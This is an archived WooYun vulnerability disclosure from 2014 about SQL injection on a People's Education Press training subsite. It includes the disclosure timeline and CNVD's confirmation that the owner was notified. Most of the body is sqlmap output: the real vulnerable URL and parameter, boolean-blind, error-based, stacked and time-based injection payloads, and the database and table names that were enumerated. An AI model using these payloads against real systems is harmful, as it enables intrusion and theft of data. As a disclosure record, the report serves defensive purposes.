乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2014-05-07: 细节已通知厂商并且等待厂商处理中 2014-05-10: 厂商已经确认,细节仅向厂商公开 2014-05-20: 细节向核心白帽子及相关领域专家公开 2014-05-30: 细节向普通白帽子公开 2014-06-09: 细节向实习白帽子公开 2014-06-21: 细节向公众公开
人民教育出版社某分站SQL注入
地址:
http://gp.pep.com.cn/
注入地址:http://gp.pep.com.cn/guopei/website/news/info.aspx?content_uid=d1d9c156-fe98-4d36-a9ac-4d2c0c4c2793
Place: GETParameter: content_uid Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: content_uid=d1d9c156-fe98-4d36-a9ac-4d2c0c4c2793' AND 7426=7426 AND 'xVTC'='xVTC Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: content_uid=d1d9c156-fe98-4d36-a9ac-4d2c0c4c2793' AND 7370=CONVERT(INT,(CHAR(58) CHAR(116) CHAR(113) CHAR(121) CHAR(58) (SELECT (CASE WHEN (7370=7370) THEN CHAR(49) ELSE CHAR(48) END)) CHAR(58) CHAR(100) CHAR(99) CHAR(116) CHAR(58))) AND 'Vbxr'='Vbxr Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries Payload: content_uid=d1d9c156-fe98-4d36-a9ac-4d2c0c4c2793'; WAITFOR DELAY '0:0:5'-- Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind Payload: content_uid=d1d9c156-fe98-4d36-a9ac-4d2c0c4c2793' WAITFOR DELAY '0:0:5'-----web server operating system: Windows 2008web application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 7.5back-end DBMS: Microsoft SQL Server 2008available databases [9]:[*] Enterprise[*] gp2013[*] guopei[*] master[*] model[*] msdb[*] ReportServer[*] ReportServerTempDB[*] tempdb
web server operating system: Windows 2008web application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 7.5back-end DBMS: Microsoft SQL Server 2008Database: guopei[992 tables]+-----------------------------------------+| A || Course || Node || Nv_Connection || TB_ReceiveSMS || bbs_forum || bbs_forum_admin || bbs_forum_relative || bbs_forum_type || bbs_replay || bbs_topic || bbs_visit_log || book_book || book_borrower || book_order_book || book_order_header || book_press || book_renew || book_shelve_record || book_shopcart || book_user_shopcart || bos_advt || bos_ec_balance_account_log || bos_ec_comment || bos_ec_deliver_type || bos_ec_favorite || bos_ec_generate_rule || bos_ec_payment_bank || bos_ec_payment_log || bos_ec_payment_platform || bos_ec_payment_type |...............
如上
修补
危害等级:中
漏洞Rank:10
确认时间:2014-05-10 00:22
CNVD确认并复现所述情况,已经由CNVD直接联系网站管理单位人民教育出版社(国培计划)网站管理方处置。
暂无